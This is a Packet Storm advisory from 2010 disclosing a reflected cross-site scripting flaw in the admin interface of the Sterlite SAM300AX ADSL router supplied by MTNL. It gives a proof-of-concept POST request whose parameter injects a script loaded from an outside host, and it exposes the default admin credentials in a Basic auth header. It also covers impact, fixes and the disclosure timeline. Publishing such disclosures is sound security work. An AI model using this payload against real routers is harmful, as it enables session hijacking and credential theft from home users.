what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Sterlite SAM300AX ADSL Router Cross Site Scripting

Sterlite SAM300AX ADSL Router Cross Site Scripting
Posted Feb 5, 2010
Authored by Karn Ganeshen

The Sterlite SAM300AX ADSL router suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | ea13b3f42e97c90cb75d14122848df9010bb5a8bd33466c7263cbf7b187b24a7

Sterlite SAM300AX ADSL Router Cross Site Scripting

Change Mirror Download
*Sterlite SAM300AX ADSL router* is provided through MTNL, New Delhi, India,
amongst other national / international locations
(www.sterlitetechnologies.com /
http://sterlitetechnologies.com/sterlite.aspx).

##########

*+About MTNL+*

http://mtnldelhi.in/glance/index.htm

MTNL was set up on 1st April, 1986 by the Government of India to upgrade the
quality of telecom services, expand the telecom network, introduce new
services and to raise revenue for telecom development needs of India’s key
metros – Delhi, the political capital and Mumbai, the business capital of
India.

Govt. of India currently holds 56.25% stake in the company.

*+Broadband device used+*

http://delhi.mtnl.net.in/services/broadband.htm

Sterlite SAM300AX ADSL router is deployed by MTNL at user's end (usually
home / small office) for internet broadband services.

*+Vulnerability+*

A. Reflective Cross Site Scripting ( May also result in remote code
execution )

*+Details of Vulnerability+*

The management interface of the router is accessible through HTTP. After
logging in, we are presented with various administrative screens.

It has been found that the user input is not properly filtered and / or
encoded by the application. Hence, allowing an attacker to execute scripts
on the user's browser.

*+Pre-Requisites+*
*User logged on to the Router.*
*
+PoC+*

One of the vulnerable HTTP requests & parameters is provided below for
reference.
Go to Menu -> Statistics

*+POST Request+*

POST http://192.168.1.1/Forms/status_statistics_1 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7)
Gecko/20091221 Firefox/3.5.7 Paros/3.2.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.1.1/status/status_statistics.htm
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-length: 101

*+POST Parameters+*

Stat_Radio=%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org
%2Fxss.js%3E%3C%2FSCRIPT%3E&StatRefresh=REFRESH

*+Impact+*

High Impact. This device is supplied in Delhi, and Mumbai through MTNL, a
Govt. of India controlled organization. As there is no filtering / encoding
in place, an attacker has the opportunity to get the scripts executed by the
user (logged on to the router http://192.168.1.1). XSS can be used to obtain
login credentials, download malware, execute scripts from external sources,
gain access to the system and subsequently perform further serious attacks
like DoS/DDoS.

*+Solution+*

A. Sanitize / filter all input.
B. Ensure ALL Input and Output is encoded properly.

*+References+*
-> OWASP (www.owasp.org)

##########

*Vulnerability Found:* January 19, 2010

*Vendor First Notified: January 20, 2010 *
*Vendor Response:* None

*Follow Up Notification: *January 27, 2010
*Vendor Response:* None

*Public Disclosure:* February 05, 2010

##########

Best Regards,
Karn Ganeshen
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close